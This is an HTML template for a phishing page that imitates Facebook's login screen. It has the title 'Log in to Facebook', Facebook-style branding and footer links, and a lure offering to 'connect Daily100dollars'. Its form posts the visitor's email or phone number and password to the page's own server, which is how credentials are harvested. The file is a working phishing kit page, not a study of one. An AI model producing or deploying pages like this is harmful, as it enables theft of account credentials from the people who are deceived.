<!DOCTYPE html>
<html>
<head>
	<title>Log in to Facebook</title>
<meta charset="utf-8">
<link rel="icon" href="img/fb.png" sizes="16x16">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<body>

	<style>
	.asdf{
	    padding-top: 50px;
	    padding-right: 30px;
	    padding-bottom: 50px;
	    padding-left: 80px
	}	
	input {
	    width:80%;
	    height: 40px;
	    margin-left: 18px;

	}
	button{
		width: 80%;
		height: 40px;
		margin-left: 18px;
	}
	</style>
<div >		
		
		<div style="background-color: #3b5998;height:85px;color: white;">
			<p style="font-size: 40px;text-indent: 10%;line-height:2.5;" ><b>facebook</b></p>
		</div>

	<div style="background-color:  rgb(218, 221, 239)">
	<br>
	<br>
	<br>
	<br>
	<form method="Post" class="col-md-4 col-md-offset-4">
		{% csrf_token %}
		<div>
			
		<div style="background-color: white;
		width:350px;
		
		margin-right: 10%; 
		padding-left:10px;padding-top:20px;
		padding-bottom:20px; " >	
		<p style="text-align: center;font-size:120%">Log in to  your Facebook to connect <a href="#">Daily100dollars</a></p>
		<input type="text" name="user" placeholder="Email address or Phone number" >
		<br>
		<br>
		<input type="Password" name="pass" placeholder="Password">
		<br><br>

		<button type="submit" style="color:white; background-color: #3b5998;">Log In</button>
		<br>
		<a href="" style="font-size:12px;text-align: center;margin-left: 20px;">Forgotten account?</a><a href=""style="font-size:12px;">  Sign up for Facebook</a>
		</div>
	</div>

	</form>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
		<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>

	<br>
	<br>
	</div>
	</div>
	<br>	
	<div style="font-size:13px;word-spacing: 2px;">
		<a href="#">Sign Up</a>
		<a href="#">Log In</a>
		<a href="#">Messenger</a>
		<a href="#">Facebook </a>
		<a href="#">LiteMobile</a>
		<a href="#">Find Friends</a>
		<a href="#">People</a>
		<a href="#">Pages</a>
		<a href="#">Places</a>
		<a href="#">Games</a>
		<a href="#">Locations</a>
		<a href="#">Marketplace</a>
		<a href="#">Videos</a>
		<a href="#">Groups</a>
		<a href="#">Recipes</a>
		<a href="#">Sports</a>
		<a href="#">Look</a>
		<a href="#">Moments</a>
		<a href="#">Instagram</a>
		<a href="#">Local</a>
		<a href="#">About</a>
		<a href="#">Create</a> 
		<a href="#">adCreate</a> 
		<a href="#">Page</a>
		<a href="#">Developers</a>
		<a href="#">Careers</a>
		<a href="#">Privacy</a>
		<a href="#">Cookies</a>
		<a href="#">AdChoices</a>
		<a href="#">Terms</a>
		<a href="#">Help</a>
		<a href="#">Settings</a>
		<a href="#Activity">Activity </a>
		<a href="#log">log</a>
	Facebook © 2018
	</div>
</body>
</html>